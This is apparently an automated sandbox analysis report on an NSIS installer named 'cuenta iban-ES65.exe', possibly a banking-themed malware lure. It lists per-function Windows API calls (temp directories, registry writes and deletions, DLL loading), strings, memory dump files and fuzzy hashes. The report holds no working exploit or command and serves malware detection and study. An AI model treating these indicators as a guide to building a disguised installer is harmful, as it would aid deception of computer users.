C:\Users\user\Desktop\cuenta iban-ES65.exe, xrefs: 00402C7D, 00402C8C, 00402CA0, 00402CC0
C:\Users\user\Desktop, xrefs: 00402CC1, 00402CC6, 00402CCC
Error launching installer, xrefs: 00402CB6
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E3E
soft, xrefs: 00402D54
Inst, xrefs: 00402D4B
"C:\Users\user\Desktop\cuenta iban-ES65.exe", xrefs: 00402C66
Null, xrefs: 00402D5D
C:\Users\user\AppData\Local\Temp\, xrefs: 00402C6D

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\cuenta iban-ES65.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\cuenta iban-ES65.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 4283519449-434490403
Opcode ID: ade385f577374e8dc66d5b5cc495e95f7f1f773012bbca210bc499bf2ace4bcf
Instruction ID: fe9ef23653e85685a193ad9c5457c4b2e55d644b791d7b95544962d8ab1ad500
Opcode Fuzzy Hash: ade385f577374e8dc66d5b5cc495e95f7f1f773012bbca210bc499bf2ace4bcf
Instruction Fuzzy Hash: CC51F471941214AFEB119F65DE89B9E7BA8EF04364F14803BF904B62D1D7BC8D408BAD

Uniqueness

Uniqueness Score: -1.00%

Function 00401751 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\Disenthralls\Ethnogenist82,00000000,00000000,00000031), ref: 00401790
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\Disenthralls\Ethnogenist82,00000000,00000000,00000031), ref: 004017BA

Part of subcall function 00405D0C: lstrcpynA.KERNEL32(?,?,00000400,0040319A,Centrifugers Setup,NSIS Error), ref: 00405D19

Part of subcall function 00404F25: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll,00000000,0078FCF8,773023A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000,?), ref: 00404F5E
Part of subcall function 00404F25: lstrlenA.KERNEL32(00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll,00000000,0078FCF8,773023A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000), ref: 00404F6E
Part of subcall function 00404F25: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll,00402FD7,00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll,00000000,0078FCF8,773023A0), ref: 00404F81
Part of subcall function 00404F25: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll), ref: 00404F93
Part of subcall function 00404F25: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FB9
Part of subcall function 00404F25: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FD3
Part of subcall function 00404F25: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FE1

Strings

C:\Users\user\AppData\Local\Temp\nsn876E.tmp, xrefs: 0040179B, 0040180A, 00401828
C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\Disenthralls\Ethnogenist82, xrefs: 0040177E
Call, xrefs: 0040176D, 00401776, 00401783, 00401795, 004017A6, 004017DC, 004017F2, 00401810, 00401850, 004018D1, 004018DA, 004018E4, 004018EF
C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll, xrefs: 0040181E, 0040183A

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\Disenthralls\Ethnogenist82$C:\Users\user\AppData\Local\Temp\nsn876E.tmp$C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll$Call
API String ID: 1941528284-358614821
Opcode ID: 9b300b49a9657bfd428a479fc8852c58b384813346898322a4567d762304faaf
Instruction ID: e334bcbcf7859558867c6a38b10ffbeddee8f855bc543c6a7f27992f07fd6e89
Opcode Fuzzy Hash: 9b300b49a9657bfd428a479fc8852c58b384813346898322a4567d762304faaf
Instruction Fuzzy Hash: 4B41C672900519BADB107BA5CC45DAF7AB9DF46329B20C33BF021B20E1C67C4A419A5D

Uniqueness

Uniqueness Score: -1.00%

Function 00404F24 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll,00000000,0078FCF8,773023A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000,?), ref: 00404F5E
lstrlenA.KERNEL32(00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll,00000000,0078FCF8,773023A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000), ref: 00404F6E
lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll,00402FD7,00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll,00000000,0078FCF8,773023A0), ref: 00404F81
SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll), ref: 00404F93
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FB9
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FD3
SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FE1

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll, xrefs: 00404F45, 00404F57, 00404F5D, 00404F80, 00404F8C

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll
API String ID: 2531174081-1684539123
Opcode ID: 3838b2816ba69de5db7070bc26f4e1419d3d5563fea52fcd95a51909cbd1a549
Instruction ID: e065fdbc23374c89c429802136f4dfae0103219b14b1aabc61908e5459041bd1
Opcode Fuzzy Hash: 3838b2816ba69de5db7070bc26f4e1419d3d5563fea52fcd95a51909cbd1a549
Instruction Fuzzy Hash: 4D219F71900118BEDF119FA5DD849DEBFA9EF49354F04807AFA04A6291C7388A409BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404F25 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll,00000000,0078FCF8,773023A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000,?), ref: 00404F5E
lstrlenA.KERNEL32(00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll,00000000,0078FCF8,773023A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000), ref: 00404F6E
lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll,00402FD7,00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll,00000000,0078FCF8,773023A0), ref: 00404F81
SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll), ref: 00404F93
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FB9
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FD3
SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FE1

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll, xrefs: 00404F45, 00404F57, 00404F5D, 00404F80, 00404F8C

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll
API String ID: 2531174081-1684539123
Opcode ID: ffeeb4340939991043f1e35409b025ff27b4b0c44884115af8641db84ff7770b
Instruction ID: b1dc6bec94ba42b715134808c0c3c35089c42976f802e7ea77bea70e7b84fba8
Opcode Fuzzy Hash: ffeeb4340939991043f1e35409b025ff27b4b0c44884115af8641db84ff7770b
Instruction Fuzzy Hash: 1F21817190011DBFDF119FA5DD449DEBFA9EF45354F04807AFA04A6291C7388E409BA8

Uniqueness

Uniqueness Score: -1.00%

Function 004053EB Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040542E
GetLastError.KERNEL32 ref: 00405442
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405457
GetLastError.KERNEL32 ref: 00405461

Strings

C:\Users\user\Desktop, xrefs: 004053EB
ds@, xrefs: 00405420
ts@, xrefs: 004053F1
C:\Users\user\AppData\Local\Temp\, xrefs: 00405411

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
API String ID: 3449924974-2230009264
Opcode ID: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
Instruction ID: 8acfd36fb30660db29d177a8be8d7647adb8d58efdd4f3c758bfd1505ce0b010
Opcode Fuzzy Hash: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
Instruction Fuzzy Hash: CF010871D14259EADF119FA4D9447EFBFB8EF04315F004176E904B6290D378A644CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 00406037 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040604E
wsprintfA.USER32 ref: 00406087
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040609B

Strings

UXTHEME, xrefs: 00406040
\, xrefs: 0040605F
%s%s.dll, xrefs: 00406081

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
Instruction ID: 17439860729f5247506b6fa79cc71e4dc0dc9fec6db89644704a68070b9bc3a3
Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
Instruction Fuzzy Hash: BAF0F630A40209ABEB14EB78DC0DFEB365CAB08305F14017AB547F11D2EA78E8258B69

Uniqueness

Uniqueness Score: -1.00%

Function 00402E9F Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402F06
GetTickCount.KERNEL32 ref: 00402F8A
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402FB3
wsprintfA.USER32 ref: 00402FC3

Strings

... %d%%, xrefs: 00402FBD

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: 64d2ce798d2dc69bad610a2ea0e87ea1e6662520605f5bed10a59724df5d2c56
Instruction ID: 2f6adf6c827ed57ff932280c4bcb171559557b12de80228d6f8143075edc11b6
Opcode Fuzzy Hash: 64d2ce798d2dc69bad610a2ea0e87ea1e6662520605f5bed10a59724df5d2c56
Instruction Fuzzy Hash: 5D519E7280221AABDB10DF65DA44A9F7BB8AF00755F14417BFD10B32C4C7788E51DBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00402364 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023A2
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsn876E.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023C2
RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsn876E.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023FB
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsn876E.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024D8

Strings

C:\Users\user\AppData\Local\Temp\nsn876E.tmp, xrefs: 004023B3, 004023D5, 004023E5, 004023F0

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsn876E.tmp
API String ID: 1356686001-2545782388
Opcode ID: b012daf43883be94562b48873df64982ee1afc678edabc89ed89c70fe9f2269d
Instruction ID: 90de9cbbb944b5ce7c16acb051fe3e73370ea29dc9d439d86f68b9f38bc34e97
Opcode Fuzzy Hash: b012daf43883be94562b48873df64982ee1afc678edabc89ed89c70fe9f2269d
Instruction Fuzzy Hash: 04117572E00108BFEB10AFA4EE89EAF767DEB54358F10403AF505B61D1D6B85D419B28

Uniqueness

Uniqueness Score: -1.00%

Function 004059AE Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004059C2
GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059DC

Strings

nsa, xrefs: 004059B9
"C:\Users\user\Desktop\cuenta iban-ES65.exe", xrefs: 004059AE
C:\Users\user\AppData\Local\Temp\, xrefs: 004059B1

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\cuenta iban-ES65.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-2108198058
Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
Instruction ID: 14833181556f01f8699e9ecebe408800633a5ab51cc0013a882439dab00eebba
Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
Instruction Fuzzy Hash: 2AF0E232708204ABEB109F15EC04B9B7B9CDF91720F00C03BFA049A181D2B598448B58

Uniqueness

Uniqueness Score: -1.00%

Function 00402A7A Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(?,?,00000000,00000000,?), ref: 00402A9B
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
RegCloseKey.ADVAPI32(?), ref: 00402AE0
RegCloseKey.ADVAPI32(?), ref: 00402B05
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
